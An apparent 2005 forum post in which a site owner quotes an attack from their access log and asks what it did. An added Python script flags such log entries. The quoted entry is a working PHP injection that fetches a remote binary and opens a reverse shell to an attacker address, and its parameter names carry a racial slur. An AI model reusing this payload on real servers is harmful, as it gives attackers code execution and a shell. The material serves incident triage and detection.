Anyone know what this remote root exploit does?
I found the following in my access_log:

202.84.223.166 - - [18/May/2005:17:48:07 -0400] "GET /admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=d6510099c6293d5c50bcabefa76b6c46&niggaip=203.81.202.65&niggaport=6432&nigga=$a=fopen(\"http://www.pakhackers.com/pgc\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sesss_\",0777);system(\"/tmp/.sesss_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.0" 200 3941

This is a remote code execution exploit. It took over the userid running the http server. From there, it somehow got into root and executed "find /home/ -name index.* -exec cp /home/index.php".
Does anyone have information on this hack and everything it may have done to my system, especially what local root vulnerability it exploited?
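
An added example, not part of the original post: a triage pass over an access log that flags entries shaped like the one quoted above (directory traversal sequences, PHP function calls and remote URLs inside the request). The sample entries, addresses and host name are constructed, and the heuristics are assumptions of this example rather than a complete signature set.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status bytes.
# The request is matched greedily up to the last quote, because injected
# code can contain quotes of its own, as in the entry quoted in the post.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3}) \S+')

# Heuristics chosen for this example; not a complete signature set.
TRAVERSAL_RE = re.compile(r'(?:\.\./){2,}')
PHP_CALL_RE = re.compile(
    r'\b(fopen|fread|fwrite|chmod|system|exec|passthru|shell_exec|popen|eval)\s*\(',
    re.I)
REMOTE_URL_RE = re.compile(r'\b(?:https?|ftp)://', re.I)

# Constructed sample entries (documentation addresses, placeholder host name).
SAMPLE = [
    r'192.0.2.10 - - [18/May/2005:17:40:01 -0400] "GET /index.php?topic=12 HTTP/1.0" 200 5120',
    r'192.0.2.66 - - [18/May/2005:17:48:07 -0400] "GET /admin/admin_styles.php?mode=addnew&install_to=../../../../tmp&x=$a=fopen(\"http://example.invalid/f\",\"r\");system(\"/tmp/.f%20\".$_REQUEST[p]); HTTP/1.0" 200 3941',
]


def inspect_line(line):
    """Parse one entry; return host, time, status and the reasons it looks hostile."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, when, request, status = m.groups()
    # Drop the method and the trailing protocol token, keep path and query.
    target = re.sub(r' HTTP/\d\.\d$', '', request.partition(' ')[2])
    decoded = unquote(target)  # percent-decoding exposes %20, %28 and similar
    reasons = []
    if TRAVERSAL_RE.search(decoded):
        reasons.append('path-traversal')
    calls = sorted({c.lower() for c in PHP_CALL_RE.findall(decoded)})
    reasons += ['php-call:' + c for c in calls]
    if REMOTE_URL_RE.search(decoded):
        reasons.append('remote-url')
    return {'host': host, 'time': when, 'status': int(status), 'reasons': reasons}


def scan(lines):
    """Return only the entries that matched at least one heuristic."""
    parsed = (inspect_line(entry) for entry in lines)
    return [p for p in parsed if p and p['reasons']]


if __name__ == '__main__':
    for hit in scan(SAMPLE):
        print(hit['time'], hit['host'], hit['status'], ', '.join(hit['reasons']))
```

A 200 status on a flagged entry only shows that the server answered the request; whether the injected code ran has to be confirmed from other evidence, such as files left in /tmp.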